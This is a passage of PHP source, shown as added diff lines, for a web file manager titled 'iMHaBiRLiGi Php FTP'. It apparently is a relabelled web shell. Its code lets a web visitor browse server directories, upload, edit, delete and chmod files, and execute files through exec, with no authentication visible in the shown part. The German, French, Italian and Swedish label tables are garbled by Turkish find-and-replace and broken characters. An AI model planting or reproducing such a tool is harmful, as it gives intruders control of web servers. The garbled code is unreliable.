1px solid black">' . word('group') . '</td> + <td>' . word('other') . '</td> + </tr> + <tr> + <td style="text-align: right">' . word('read') . ':</td> + <td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td> + </tr> + <tr> + <td style="text-align: right">' . word('write') . ':</td> + <td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td> + </tr> + <tr> + <td style="text-align: right">' . word('execute') . ':</td> + <td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td> + <td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td> + </tr> + </table> + + <hr /> + + <input type="submit" name="set" value="' . word('set') . '" /> + + <input type="hidden" name="action" value="permission" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + + } + + break; + +default: + + listing_page(); + +} + +/* ------------------------------------------------------------------------- */ + +function getlist ($directory) { + global $delim, $win; + + if ($d = @opendir($directory)) { + + while (($filename = @readdir($d)) !== false) { + + $path = $directory . $filename; + + if ($stat = @lstat($path)) { + + $file = array( + 'filename' => $filename, + 'path' => $path, + 'is_file' => @is_file($path), + 'is_dir' => @is_dir($path), + 'is_link' => @is_link($path), + 'is_readable' => @is_readable($path), + 'is_writable' => @is_writable($path), + 'size' => $stat['size'], + 'permission' => $stat['mode'], + 'owner' => $stat['uid'], + 'group' => $stat['gid'], + 'mtime' => @filemtime($path), + 'atime' => @fileatime($path), + 'ctime' => @filectime($path) + ); + + if ($file['is_dir']) { + $file['is_executable'] = @file_exists($path . $delim . '.'); + } else { + if (!$win) { + $file['is_executable'] = @is_executable($path); + } else { + $file['is_executable'] = true; + } + } + + if ($file['is_link']) $file['target'] = @readlink($path); + + if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner'])); + if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group'])); + + $files[] = $file; + + } + + } + + return $files; + + } else { + return false; + } + +} + +function sortlist (&$list, $key, $reverse) { + + quicksort($list, 0, sizeof($list) - 1, $key); + + if ($reverse) $list = array_reverse($list); + +} + +function quicksort (&$array, $first, $last, $key) { + + if ($first < $last) { + + $cmp = $array[floor(($first + $last) / 2)][$key]; + + $l = $first; + $r = $last; + + while ($l <= $r) { + + while ($array[$l][$key] < $cmp) $l++; + while ($array[$r][$key] > $cmp) $r--; + + if ($l <= $r) { + + $tmp = $array[$l]; + $array[$l] = $array[$r]; + $array[$r] = $tmp; + + $l++; + $r--; + + } + + } + + quicksort($array, $first, $r, $key); + quicksort($array, $l, $last, $key); + + } + +} + +function permission_octal2string ($mode) { + + if (($mode & 0xC000) === 0xC000) { + $type = 's'; + } elseif (($mode & 0xA000) === 0xA000) { + $type = 'l'; + } elseif (($mode & 0x8000) === 0x8000) { + $type = '-'; + } elseif (($mode & 0x6000) === 0x6000) { + $type = 'b'; + } elseif (($mode & 0x4000) === 0x4000) { + $type = 'd'; + } elseif (($mode & 0x2000) === 0x2000) { + $type = 'c'; + } elseif (($mode & 0x1000) === 0x1000) { + $type = 'p'; + } else { + $type = '?'; + } + + $owner = ($mode & 00400) ? 'r' : '-'; + $owner .= ($mode & 00200) ? 'w' : '-'; + if ($mode & 0x800) { + $owner .= ($mode & 00100) ? 's' : 'S'; + } else { + $owner .= ($mode & 00100) ? 'x' : '-'; + } + + $group = ($mode & 00040) ? 'r' : '-'; + $group .= ($mode & 00020) ? 'w' : '-'; + if ($mode & 0x400) { + $group .= ($mode & 00010) ? 's' : 'S'; + } else { + $group .= ($mode & 00010) ? 'x' : '-'; + } + + $other = ($mode & 00004) ? 'r' : '-'; + $other .= ($mode & 00002) ? 'w' : '-'; + if ($mode & 0x200) { + $other .= ($mode & 00001) ? 't' : 'T'; + } else { + $other .= ($mode & 00001) ? 'x' : '-'; + } + + return $type . $owner . $group . $other; + +} + +function is_script ($filename) { + return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename); +} + +function getmimetype ($filename) { + static $mimes = array( + '\.jpg$|\.jpeg$' => 'image/jpeg', + '\.gif$' => 'image/gif', + '\.png$' => 'image/png', + '\.html$|\.html$' => 'text/html', + '\.txt$|\.asc$' => 'text/plain', + '\.xml$|\.xsl$' => 'application/xml', + '\.pdf$' => 'application/pdf' + ); + + foreach ($mimes as $regex => $mime) { + if (eregi($regex, $filename)) return $mime; + } + + // return 'application/octet-stream'; + return 'text/plain'; + +} + +function del ($file) { + global $delim; + + if (!@is_link($file) && !file_exists($file)) return false; + + if (!@is_link($file) && @is_dir($file)) { + + if ($dir = @opendir($file)) { + + $error = false; + + while (($f = readdir($dir)) !== false) { + if ($f != '.' && $f != '..' && !del($file . $delim . $f)) { + $error = true; + } + } + closedir($dir); + + if (!$error) return @rmdir($file); + + return !$error; + + } else { + return false; + } + + } else { + return @unlink($file); + } + +} + +function addslash ($directory) { + global $delim; + + if (substr($directory, -1, 1) != $delim) { + return $directory . $delim; + } else { + return $directory; + } + +} + +function relative2absolute ($string, $directory) { + + if (path_is_relative($string)) { + return simplify_path(addslash($directory) . $string); + } else { + return simplify_path($string); + } + +} + +function path_is_relative ($path) { + global $win; + + if ($win) { + return (substr($path, 1, 1) != ':'); + } else { + return (substr($path, 0, 1) != '/'); + } + +} + +function absolute2relative ($directory, $target) { + global $delim; + + $path = ''; + while ($directory != $target) { + if ($directory == substr($target, 0, strlen($directory))) { + $path .= substr($target, strlen($directory)); + break; + } else { + $path .= '..' . $delim; + $directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1); + } + } + if ($path == '') $path = '.'; + + return $path; + +} + +function simplify_path ($path) { + global $delim; + + if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') { + $path = realpath($path); + if (@is_dir($path)) { + return addslash($path); + } else { + return $path; + } + } + + $pattern = $delim . '.' . $delim; + + if (@is_dir($path)) { + $path = addslash($path); + } + + while (strpos($path, $pattern) !== false) { + $path = str_replace($pattern, $delim, $path); + } + + $e = addslashes($delim); + $regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e; + + while (ereg($regex, $path)) { + $path = ereg_replace($regex, $delim, $path); + } + + return $path; + +} + +function human_filesize ($filesize) { + + $suffices = 'kMGTPE'; + + $n = 0; + while ($filesize >= 1000) { + $filesize /= 1024; + $n++; + } + + $filesize = round($filesize, 3 - strpos($filesize, '.')); + + if (strpos($filesize, '.') !== false) { + while (in_array(substr($filesize, -1, 1), array('0', '.'))) { + $filesize = substr($filesize, 0, strlen($filesize) - 1); + } + } + + $suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1)); + + return $filesize . " {$suffix}B"; + +} + +function strip (&$str) { + $str = stripslashes($str); +} + +/* ------------------------------------------------------------------------- */ + +function listing_page ($message = null) { + global $self, $directory, $sort, $reverse; + + html_header(); + + $list = getlist($directory); + + if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename'; + if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false; + + sortlist($list, $sort, $reverse); + + echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1> + +<form enctype="multipart/form-data" action="' . $self . '" method="post"> + +<table id="main"> +'; + + directory_choice(); + + if (!empty($message)) { + spacer(); + echo $message; + } + + if (@is_writable($directory)) { + upload_box(); + create_box(); + } else { + spacer(); + } + + if ($list) { + listing($list); + } else { + echo error('not_readable', $directory); + } + + echo '</table> + +</form> + +'; + + html_footer(); + +} + +function listing ($list) { + global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self; + + echo '<tr class="listing"> + <th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th> +'; + + $d = 'dir=' . urlencode($directory) . '&amp;'; + + if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n"; + + if (!$reverse && $sort == 'size') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"size\"><a href=\"$self?{$d}sort=size$r\">" . word('size') . "</a></th>\n"; + + if (!$win) { + + if (!$reverse && $sort == 'permission') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">" . word('permission') . "</a></th>\n"; + + if (!$reverse && $sort == 'owner') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"owner\"><a href=\"$self?{$d}sort=owner$r\">" . word('owner') . "</a></th>\n"; + + if (!$reverse && $sort == 'group') $r = '&amp;reverse=true'; else $r = ''; + echo "\t<th class=\"group\"><a href=\"$self?{$d}sort=group$r\">" . word('group') . "</a></th>\n"; + + } + + echo ' <th class="Gِrevler">' . word('Gِrevler') . '</th> +</tr> +'; + + for ($i = 0; $i < sizeof($list); $i++) { + $file = $list[$i]; + + $timestamps = 'mtime: ' . date($date_format, $file['mtime']) . ', '; + $timestamps .= 'atime: ' . date($date_format, $file['atime']) . ', '; + $timestamps .= 'ctime: ' . date($date_format, $file['ctime']); + + echo '<tr class="listing"> + <td class="checkbox"><input type="checkbox" name="checked' . $i . '" value="true" onfocus="activate(\'other\')" /></td> + <td class="filename" title="' . html($timestamps) . '">'; + + if ($file['is_link']) { + + echo '<img src="' . $self . '?image=link" alt="link" /> '; + echo html($file['filename']) . ' &rarr; '; + + $real_file = relative2absolute($file['target'], $directory); + + if (@is_readable($real_file)) { + if (@is_dir($real_file)) { + echo '[ <a href="' . $self . '?dir=' . urlencode($real_file) . '">' . html($file['target']) . '</a> ]'; + } else { + echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($real_file) . '">' . html($file['target']) . '</a>'; + } + } else { + echo html($file['target']); + } + + } elseif ($file['is_dir']) { + + echo '<img src="' . $self . '?image=folder" alt="folder" /> [ '; + if ($win || $file['is_executable']) { + echo '<a href="' . $self . '?dir=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>'; + } else { + echo html($file['filename']); + } + echo ' ]'; + + } else { + + if (substr($file['filename'], 0, 1) == '.') { + echo '<img src="' . $self . '?image=hidden_file" alt="hidden file" /> '; + } else { + echo '<img src="' . $self . '?image=file" alt="file" /> '; + } + + if ($file['is_file'] && $file['is_readable']) { + echo '<a href="' . $self . '?action=view&amp;file=' . urlencode($file['path']) . '">' . html($file['filename']) . '</a>'; + } else { + echo html($file['filename']); + } + + } + + if ($file['size'] >= 1000) { + $human = ' title="' . human_filesize($file['size']) . '"'; + } else { + $human = ''; + } + + echo "\t<td class=\"size\"$human>{$file['size']} B</td>\n"; + + if (!$win) { + + echo "\t<td class=\"permission\" title=\"" . decoct($file['permission']) . '">'; + + $l = !$file['is_link'] && (!function_exists('posix_getuid') || $file['owner'] == posix_getuid()); + if ($l) echo '<a href="' . $self . '?action=permission&amp;file=' . urlencode($file['path']) . '&amp;dir=' . urlencode($directory) . '">'; + echo html(permission_octal2string($file['permission'])); + if ($l) echo '</a>'; + + echo "</td>\n"; + + if (array_key_exists('owner_name', $file)) { + echo "\t<td class=\"owner\" title=\"uid: {$file['owner']}\">{$file['owner_name']}</td>\n"; + } else { + echo "\t<td class=\"owner\">{$file['owner']}</td>\n"; + } + + if (array_key_exists('group_name', $file)) { + echo "\t<td class=\"group\" title=\"gid: {$file['group']}\">{$file['group_name']}</td>\n"; + } else { + echo "\t<td class=\"group\">{$file['group']}</td>\n"; + } + + } + + echo ' <td class="Gِrevler"> + <input type="hidden" name="file' . $i . '" value="' . html($file['path']) . '" /> +'; + + $actions = array(); + if (function_exists('symlink')) { + $actions[] = 'create_symlink'; + } + if (@is_writable(dirname($file['path']))) { + $actions[] = 'Sil'; + $actions[] = 'Degistir'; + $actions[] = 'Tasi'; + } + if ($file['is_file'] && $file['is_readable']) { + $actions[] = 'Kopyala'; + $actions[] = 'indir'; + if ($file['is_writable']) $actions[] = 'Düzenle'; + } + if (!$win && function_exists('exec') && $file['is_file'] && $file['is_executable'] && file_exists('/bin/sh')) { + $actions[] = 'execute'; + } + + if (sizeof($actions) > 0) { + + echo ' <select class="small" name="action' . $i . '" size="1"> + <option value="">' . str_repeat('&nbsp;', 30) . '</option> +'; + + foreach ($actions as $action) { + echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n"; + } + + echo ' </select> + <input class="small" type="submit" name="submit' . $i . '" value=" &gt; " onfocus="activate(\'other\')" /> +'; + + } + + echo ' </td> +</tr> +'; + + } + + echo '<tr class="listing_footer"> + <td style="text-align: right; vertical-align: top"><img src="' . $self . '?image=arrow" alt="&gt;" /></td> + <td colspan="' . ($cols - 1) . '"> + <input type="hidden" name="num" value="' . sizeof($list) . '" /> + <input type="hidden" name="focus" value="" /> + <input type="hidden" name="olddir" value="' . html($directory) . '" /> +'; + + $actions = array(); + if (@is_writable(dirname($file['path']))) { + $actions[] = 'Sil'; + $actions[] = 'Tasi'; + } + $actions[] = 'Kopyala'; + + echo ' <select class="small" name="action_all" size="1"> + <option value="">' . str_repeat('&nbsp;', 30) . '</option> +'; + + foreach ($actions as $action) { + echo "\t\t<option value=\"$action\">" . word($action) . "</option>\n"; + } + + echo ' </select> + <input class="small" type="submit" name="submit_all" value=" &gt; " onfocus="activate(\'other\')" /> + </td> +</tr> +'; + +} + +function directory_choice () { + global $directory, $homedir, $cols, $self; + + echo '<tr> + <td colspan="' . $cols . '" id="directory"> + <a href="' . $self . '?dir=' . urlencode($homedir) . '">' . word('directory') . '</a>: + <input type="text" name="dir" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" onfocus="activate(\'directory\')" /> + <input type="submit" name="changedir" value="' . word('change') . '" onfocus="activate(\'directory\')" /> + </td> +</tr> +'; + +} + +function upload_box () { + global $cols; + + echo '<tr> + <td colspan="' . $cols . '" id="upload"> + ' . word('file') . ': + <input type="file" name="upload" onfocus="activate(\'other\')" /> + <input type="submit" name="submit_upload" value="' . word('upload') . '" onfocus="activate(\'other\')" /> + </td> +</tr> +'; + +} + +function create_box () { + global $cols; + + echo '<tr> + <td colspan="' . $cols . '" id="create"> + <select name="create_type" size="1" onfocus="activate(\'create\')"> + <option value="file">' . word('file') . '</option> + <option value="directory">' . word('directory') . '</option> + </select> + <input type="text" name="create_name" onfocus="activate(\'create\')" /> + <input type="submit" name="submit_create" value="' . word('create') . '" onfocus="activate(\'create\')" /> + </td> +</tr> +'; + +} + +function Düzenle ($file) { + global $self, $directory, $Düzenlecols, $Düzenlerows, $apache, $htpasswd, $htaccess; + + html_header(); + + echo '<h2 style="margin-bottom: 3pt">' . html($file) . '</h2> + +<form action="' . $self . '" method="post"> + +<table class="dialog"> +<tr> +<td class="dialog"> + + <textarea name="content" cols="' . $Düzenlecols . '" rows="' . $Düzenlerows . '" WRAP="off">'; + + if (array_key_exists('content', $_POST)) { + echo $_POST['content']; + } else { + $f = fopen($file, 'r'); + while (!feof($f)) { + echo html(fread($f, 8192)); + } + fclose($f); + } + + if (!empty($_POST['user'])) { + echo "\n" . $_POST['user'] . ':' . crypt($_POST['password']); + } + if (!empty($_POST['basic_auth'])) { + if ($win) { + $authfile = str_replace('\\', '/', $directory) . $htpasswd; + } else { + $authfile = $directory . $htpasswd; + } + echo "\nAuthType Basic\nAuthName &quot;Restricted Directory&quot;\n"; + echo 'AuthUserFile &quot;' . html($authfile) . "&quot;\n"; + echo 'Require valid-user'; + } + + echo '</textarea> + + <hr /> +'; + + if ($apache && basename($file) == $htpasswd) { + echo ' + ' . word('user') . ': <input type="text" name="user" /> + ' . word('password') . ': <input type="password" name="password" /> + <input type="submit" value="' . word('add') . '" /> + + <hr /> +'; + + } + + if ($apache && basename($file) == $htaccess) { + echo ' + <input type="submit" name="basic_auth" value="' . word('add_basic_auth') . '" /> + + <hr /> +'; + + } + + echo ' + <input type="hidden" name="action" value="Düzenle" /> + <input type="hidden" name="file" value="' . html($file) . '" /> + <input type="hidden" name="dir" value="' . html($directory) . '" /> + <input type="reset" value="' . word('reset') . '" id="red_button" /> + <input type="submit" name="save" value="' . word('save') . '" id="green_button" style="margin-left: 50px" /> + +</td> +</tr> +</table> + +<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p> + +</form> + +'; + + html_footer(); + +} + +function spacer () { + global $cols; + + echo '<tr> + <td colspan="' . $cols . '" style="height: 1em"></td> +</tr> +'; + +} + +function textfieldsize ($content) { + + $size = strlen($content) + 5; + if ($size < 30) $size = 30; + + return $size; + +} + +function request_dump () { + + foreach ($_REQUEST as $key => $value) { + echo "\t<input type=\"hidden\" name=\"" . html($key) . '" value="' . html($value) . "\" />\n"; + } + +} + +/* ------------------------------------------------------------------------- */ + +function html ($string) { + global $charset; + return htmlentities($string, ENT_COMPAT, $charset); +} + +function word ($word) { + global $words, $word_charset; + return htmlentities($words[$word], ENT_COMPAT, $word_charset); +} + +function phrase ($phrase, $arguments) { + global $words; + static $search; + + if (!is_array($search)) for ($i = 1; $i <= 8; $i++) $search[] = "%$i"; + + for ($i = 0; $i < sizeof($arguments); $i++) { + $arguments[$i] = nl2br(html($arguments[$i])); + } + + $replace = array('{' => '<pre>', '}' =>'</pre>', '[' => '<b>', ']' => '</b>'); + + return str_replace($search, $arguments, str_replace(array_keys($replace), $replace, nl2br(html($words[$phrase])))); + +} + +function getwords ($lang) { + global $word_charset, $date_format; + + switch ($lang) { + case 'de': + + $date_format = 'd.m.y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Verzeichnis', +'file' => 'Datei', +'filename' => 'Dateiname', + +'size' => 'Grِكe', +'permission' => 'Rechte', +'owner' => 'Eigner', +'group' => 'Gruppe', +'other' => 'Andere', +'Gِrevler' => 'Funktionen', + +'read' => 'lesen', +'write' => 'schreiben', +'execute' => 'ausführen', + +'create_symlink' => 'Symlink erstellen', +'Sil' => 'lِschen', +'Degistir' => 'umbenennen', +'Tasi' => 'verschieben', +'Kopyala' => 'kopieren', +'Düzenle' => 'Düzenleieren', +'indir' => 'herunterladen', +'upload' => 'hochladen', +'create' => 'erstellen', +'change' => 'wechseln', +'save' => 'speichern', +'set' => 'setze', +'reset' => 'zurücksetzen', +'relative' => 'Pfad zum Ziel relativ', + +'yes' => 'Ja', +'no' => 'Nein', +'Geri' => 'zurück', +'Yol' => 'Ziel', +'symlink' => 'Symbolischer Link', +'no_output' => 'keine Ausgabe', + +'user' => 'Benutzername', +'password' => 'Kennwort', +'add' => 'hinzufügen', +'add_basic_auth' => 'HTTP-Basic-Auth hinzufügen', + +'uploaded' => '"[%1]" wurde hochgeladen.', +'not_uploaded' => '"[%1]" konnte nicht hochgeladen werden.', +'already_exists' => '"[%1]" existiert bereits.', +'created' => '"[%1]" wurde erstellt.', +'not_created' => '"[%1]" konnte nicht erstellt werden.', +'really_Sil' => 'Sollen folgende Dateien wirklich gelِscht werden?', +'Sild' => "Folgende Dateien wurden gelِscht:\n[%1]", +'not_Sild' => "Folgende Dateien konnten nicht gelِscht werden:\n[%1]", +'Degistir_file' => 'Benenne Datei um:', +'Degistird' => '"[%1]" wurde in "[%2]" umbenannt.', +'not_Degistird' => '"[%1] konnte nicht in "[%2]" umbenannt werden.', +'Tasi_files' => 'Verschieben folgende Dateien:', +'Tasid' => "Folgende Dateien wurden nach \"[%2]\" verschoben:\n[%1]", +'not_Tasid' => "Folgende Dateien konnten nicht nach \"[%2]\" verschoben werden:\n[%1]", +'Kopyala_files' => 'Kopiere folgende Dateien:', +'copied' => "Folgende Dateien wurden nach \"[%2]\" kopiert:\n[%1]", +'not_copied' => "Folgende Dateien konnten nicht nach \"[%2]\" kopiert werden:\n[%1]", +'not_Düzenleed' => '"[%1]" kann nicht Düzenleiert werden.', +'executed' => "\"[%1]\" wurde erfolgreich ausgeführt:\n{%2}", +'not_executed' => "\"[%1]\" konnte nicht erfolgreich ausgeführt werden:\n{%2}", +'saved' => '"[%1]" wurde gespeichert.', +'not_saved' => '"[%1]" konnte nicht gespeichert werden.', +'symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" wurde erstellt.', +'not_symlinked' => 'Symbolischer Link von "[%2]" nach "[%1]" konnte nicht erstellt werden.', +'permission_for' => 'Rechte für "[%1]":', +'permission_set' => 'Die Rechte für "[%1]" wurden auf [%2] gesetzt.', +'permission_not_set' => 'Die Rechte für "[%1]" konnten nicht auf [%2] gesetzt werden.', +'not_readable' => '"[%1]" kann nicht gelesen werden.' + ); + + case 'fr': + + $date_format = 'd.m.y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Répertoire', +'file' => 'Fichier', +'filename' => 'Nom fichier', + +'size' => 'Taille', +'permission' => 'Droits', +'owner' => 'Propriétaire', +'group' => 'Groupe', +'other' => 'Autres', +'Gِrevler' => 'Fonctions', + +'read' => 'Lire', +'write' => 'Ecrire', +'execute' => 'Exécuter', + +'create_symlink' => 'Créer lien symbolique', +'Sil' => 'Effacer', +'Degistir' => 'Renommer', +'Tasi' => 'Déplacer', +'Kopyala' => 'Copier', +'Düzenle' => 'Ouvrir', +'indir' => 'Télécharger sur PC', +'upload' => 'Télécharger sur serveur', +'create' => 'Créer', +'change' => 'Changer', +'save' => 'Sauvegarder', +'set' => 'Exécuter', +'reset' => 'Réinitialiser', +'relative' => 'Relatif', + +'yes' => 'Oui', +'no' => 'Non', +'Geri' => 'Retour', +'Yol' => 'Yol', +'symlink' => 'Lien symbollique', +'no_output' => 'Pas de sortie', + +'user' => 'Utilisateur', +'password' => 'Mot de passe', +'add' => 'Ajouter', +'add_basic_auth' => 'add basic-authentification', + +'uploaded' => '"[%1]" a été téléchargé sur le serveur.', +'not_uploaded' => '"[%1]" n a pas été téléchargé sur le serveur.', +'already_exists' => '"[%1]" existe déjà.', +'created' => '"[%1]" a été créé.', +'not_created' => '"[%1]" n a pas pu être créé.', +'really_Sil' => 'Effacer le fichier?', +'Sild' => "Ces fichiers ont été détuits:\n[%1]", +'not_Sild' => "Ces fichiers n ont pu être détruits:\n[%1]", +'Degistir_file' => 'Renomme fichier:', +'Degistird' => '"[%1]" a été renommé en "[%2]".', +'not_Degistird' => '"[%1] n a pas pu être renommé en "[%2]".', +'Tasi_files' => 'Déplacer ces fichiers:', +'Tasid' => "Ces fichiers ont été déplacés en \"[%2]\":\n[%1]", +'not_Tasid' => "Ces fichiers n ont pas pu être déplacés en \"[%2]\":\n[%1]", +'Kopyala_files' => 'Copier ces fichiers:', +'copied' => "Ces fichiers ont été copiés en \"[%2]\":\n[%1]", +'not_copied' => "Ces fichiers n ont pas pu être copiés en \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" ne peut être ouvert.', +'executed' => "\"[%1]\" a été brillamment exécuté :\n{%2}", +'not_executed' => "\"[%1]\" n a pas pu être exécuté:\n{%2}", +'saved' => '"[%1]" a été sauvegardé.', +'not_saved' => '"[%1]" n a pas pu être sauvegardé.', +'symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" a été crée.', +'not_symlinked' => 'Un lien symbolique depuis "[%2]" vers "[%1]" n a pas pu être créé.', +'permission_for' => 'Droits de "[%1]":', +'permission_set' => 'Droits de "[%1]" ont été changés en [%2].', +'permission_not_set' => 'Droits de "[%1]" n ont pas pu être changés en[%2].', +'not_readable' => '"[%1]" ne peut pas être ouvert.' + ); + + case 'it': + + $date_format = 'd-m-Y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Directory', +'file' => 'File', +'filename' => 'Nome File', + +'size' => 'Dimensioni', +'permission' => 'Permessi', +'owner' => 'Proprietario', +'group' => 'Gruppo', +'other' => 'Altro', +'Gِrevler' => 'Funzioni', + +'read' => 'leggi', +'write' => 'scrivi', +'execute' => 'esegui', + +'create_symlink' => 'crea link simbolico', +'Sil' => 'cancella', +'Degistir' => 'rinomina', +'Tasi' => 'sposta', +'Kopyala' => 'copia', +'Düzenle' => 'modifica', +'indir' => 'indir', +'upload' => 'upload', +'create' => 'crea', +'change' => 'cambia', +'save' => 'salva', +'set' => 'imposta', +'reset' => 'reimposta', +'relative' => 'Percorso relativo per la destinazione', + +'yes' => 'Si', +'no' => 'No', +'Geri' => 'indietro', +'Yol' => 'Destinazione', +'symlink' => 'Link simbolico', +'no_output' => 'no output', + +'user' => 'User', +'password' => 'Password', +'add' => 'aggiungi', +'add_basic_auth' => 'aggiungi autenticazione base', + +'uploaded' => '"[%1]" è stato caricato.', +'not_uploaded' => '"[%1]" non è stato caricato.', +'already_exists' => '"[%1]" esiste già.', +'created' => '"[%1]" è stato creato.', +'not_created' => '"[%1]" non è stato creato.', +'really_Sil' => 'Cancello questi file ?', +'Sild' => "Questi file sono stati cancellati:\n[%1]", +'not_Sild' => "Questi file non possono essere cancellati:\n[%1]", +'Degistir_file' => 'File rinominato:', +'Degistird' => '"[%1]" è stato rinominato in "[%2]".', +'not_Degistird' => '"[%1] non è stato rinominato in "[%2]".', +'Tasi_files' => 'Sposto questi file:', +'Tasid' => "Questi file sono stati spostati in \"[%2]\":\n[%1]", +'not_Tasid' => "Questi file non possono essere spostati in \"[%2]\":\n[%1]", +'Kopyala_files' => 'Copio questi file', +'copied' => "Questi file sono stati copiati in \"[%2]\":\n[%1]", +'not_copied' => "Questi file non possono essere copiati in \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" non puٍ essere modificato.', +'executed' => "\"[%1]\" è stato eseguito con successo:\n{%2}", +'not_executed' => "\"[%1]\" non è stato eseguito con successo\n{%2}", +'saved' => '"[%1]" è stato salvato.', +'not_saved' => '"[%1]" non è stato salvato.', +'symlinked' => 'Il link siambolico da "[%2]" a "[%1]" è stato creato.', +'not_symlinked' => 'Il link siambolico da "[%2]" a "[%1]" non è stato creato.', +'permission_for' => 'Permessi di "[%1]":', +'permission_set' => 'I permessi di "[%1]" sono stati impostati [%2].', +'permission_not_set' => 'I permessi di "[%1]" non sono stati impostati [%2].', +'not_readable' => '"[%1]" non puٍ essere letto.' + ); + + case 'se': + + $date_format = 'n/j/y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Mapp', +'file' => 'Fil', +'filename' => 'Filnamn', + +'size' => 'Storlek', +'permission' => 'Sنkerhetsnivه', +'owner' => 'ؤgare', +'group' => 'Grupp', +'other' => 'Andra', +'Gِrevler' => 'Funktioner', + +'read' => 'Lنs', +'write' => 'Skriv', +'execute' => 'Utfِr', + +'create_symlink' => 'Skapa symlink', +'Sil' => 'Radera', +'Degistir' => 'Byt namn', +'Tasi' => 'Flytta', +'Kopyala' => 'Kopiera', +'Düzenle' => 'ؤndra', +'indir' => 'Ladda ner', +'upload' => 'Ladda upp', +'create' => 'Skapa', +'change' => 'ؤndra', +'save' => 'Spara', +'set' => 'Markera', +'reset' => 'Tِm', +'relative' => 'Relative path to target', + +'yes' => 'Ja', +'no' => 'Nej', +'Geri' => 'Tillbaks', +'Yol' => 'Yol', +'symlink' => 'Symlink', +'no_output' => 'no output', + +'user' => 'Anvنndare', +'password' => 'Lِsenord', +'add' => 'Lنgg till', +'add_basic_auth' => 'add basic-authentification', + +'uploaded' => '"[%1]" har laddats upp.', +'not_uploaded' => '"[%1]" kunde inte laddas upp.', +'already_exists' => '"[%1]" finns redan.', +'created' => '"[%1]" har skapats.', +'not_created' => '"[%1]" kunde inte skapas.', +'really_Sil' => 'Radera dessa filer?', +'Sild' => "De hنr filerna har raderats:\n[%1]", +'not_Sild' => "Dessa filer kunde inte raderas:\n[%1]", +'Degistir_file' => 'Byt namn pه fil:', +'Degistird' => '"[%1]" har bytt namn till "[%2]".', +'not_Degistird' => '"[%1] kunde inte dِpas om till "[%2]".', +'Tasi_files' => 'Flytta dessa filer:', +'Tasid' => "Dessa filer har flyttats till \"[%2]\":\n[%1]", +'not_Tasid' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]", +'Kopyala_files' => 'Kopiera dessa filer:', +'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]", +'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]", +'not_Düzenleed' => '"[%1]" kan inte نndras.', +'executed' => "\"[%1]\" har utfِrts:\n{%2}", +'not_executed' => "\"[%1]\" kunde inte utfِras:\n{%2}", +'saved' => '"[%1]" har sparats.', +'not_saved' => '"[%1]" kunde inte sparas.', +'symlinked' => 'Symlink frهn "[%2]" till "[%1]" har skapats.', +'not_symlinked' => 'Symlink frهn "[%2]" till "[%1]" kunde inte skapas.', +'permission_for' => 'Rنttigheter fِr "[%1]":', +'permission_set' => 'Rنttigheter fِr "[%1]" نndrades till [%2].', +'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].', +'not_readable' => '"[%1]" kan inte lنsas.' + ); + + case 'en': + default: + + $date_format = 'n/j/y H:i:s'; + $word_charset = 'ISO-8859-1'; + + return array( +'directory' => 'Düzergah', +'file' => 'Dosya', +'filename' => 